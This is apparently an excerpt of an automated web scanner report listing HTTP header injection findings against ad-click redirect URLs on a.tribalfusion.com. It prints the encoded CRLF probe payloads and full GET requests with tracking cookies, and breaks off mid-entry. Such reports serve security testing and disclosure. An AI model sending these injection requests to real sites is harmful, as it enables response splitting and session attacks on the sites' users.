ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the 7987e request parameter is copied into the Location response header. The payload 308ef%0d%0a21d4ff118f0 was submitted in the 7987e parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/?7987e308ef%0d%0a21d4ff118f0 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://burp/show/25 Cache-Control: max-age=0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=abnEV8xlqZbCpq4OSQ4eY8OW3wt6fZaIa5Zby32Ak5ZdPJc5fUXoI7ZafZa03falwgxkVn2F01y0pQFuYySZbChDrwlqjyBuJpN0jrf59pZcJ4cfCMdBIK8Zb6PD9sA3poqFQNdTdaNfvk9odLu1OK5XqVS5VVTZbWLB5NZbTjwlU8Tr95Roreos6dayunkSQEjZarU4rF1pZdKkKgUJQt7jQZccnPnSJao4u9MCcy7oErV3uWUa9Sm5WaK7B1ZdJ4T42yRCGFDcpFbBagwNcUQfCuHUu7mYZdkYaZbINh8m5NO6Hq4mwv6MUWeLPCe44cZbOQr1k8ZcQZdmZdaZaHZcnHhGIaT1UkluZbaQ3g15FjjKh95KgiGRXpVMPPJB7tCma8lpdZcaI7N365BWUvPQuHwidjCibqLUlpyZdxtn3A1Pmkwntr6bQbPL9NRvPlLjU19G71nph19MWLM6kUZbftXjZaK4TZdm4qSZd6veZaRCghc3VHan4WVJZaZc8r1KMN7QXikWRWeabQ59pyU788MVCexGQPEBbEn4ORHGGZbyqXGX9F1utXCPlhYZd31Za1vRcZcuOEywxn4jlWrZdVJRsOFc2G
3.55. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 7987e%0d%0a05abc341081 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/?7987e%0d%0a05abc341081=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the ord request parameter is copied into the Location response header. The payload 87fcc%0d%0a3c02d47cd03 was submitted in the ord parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/;ord=87fcc%0d%0a3c02d47cd03 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is copied into the Location response header. The payload 6ee78%0d%0a4697cd0fdb4 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/6ee78%0d%0a4697cd0fdb4/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 4 is copied into the Location response header. The payload d2c58%0d%0a02f5864db6e was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/d2c58%0d%0a02f5864db6e/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 5 is copied into the Location response header. The payload 61e23%0d%0a6f34d91a354 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/61e23%0d%0a6f34d91a354/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 6 is copied into the Location response header. The payload 79a61%0d%0a591604da318 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/79a61%0d%0a591604da318/B5094459.6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 7 is copied into the Location response header. The payload f1fb1%0d%0af39af8ac1d6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/f1fb1%0d%0af39af8ac1d6 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
3.62. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 41ee6%0d%0a7a7a7915a85 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6?41ee6%0d%0a7a7a7915a85=1 HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of the sz request parameter is copied into the Location response header. The payload 8d999%0d%0a5c8d14598ac was submitted in the sz parameter. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6;sz=8d999%0d%0a5c8d14598ac HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 3 is copied into the Location response header. The payload 74b48%0d%0a8df12efedf8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/74b48%0d%0a8df12efedf8/t.mookie1.com/t/v1/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 4 is copied into the Location response header. The payload 80bfa%0d%0aa4f0fdf3135 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/80bfa%0d%0aa4f0fdf3135/t/v1/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 5 is copied into the Location response header. The payload fd929%0d%0a0f9f3457d9f was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/fd929%0d%0a0f9f3457d9f/v1/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 6 is copied into the Location response header. The payload f749e%0d%0aadf104c6dd3 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.
Request
GET /h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/f749e%0d%0aadf104c6dd3/clk HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The value of REST URL parameter 7 is copied into the Location response header. The payload 1dd10%0d%0ab9b49b742a6 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.
Request
